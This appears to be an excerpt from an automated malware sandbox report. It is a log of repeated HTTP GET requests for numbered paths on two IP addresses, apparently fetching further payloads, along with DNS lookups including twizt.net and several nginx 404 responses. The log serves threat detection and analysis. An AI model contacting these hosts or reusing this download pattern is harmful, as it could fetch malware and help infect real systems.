                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Host: 91.202.233.141
                            Source: global trafficHTTP traffic detected: GET /_1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficHTTP traffic detected: GET /_2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Host: 185.215.113.66
                            Source: global trafficDNS traffic detected: DNS query: yahoo.com
                            Source: global trafficDNS traffic detected: DNS query: mta7.am0.yahoodns.net
                            Source: global trafficDNS traffic detected: DNS query: twizt.net
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:08 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:15 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 May 2024 13:23:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
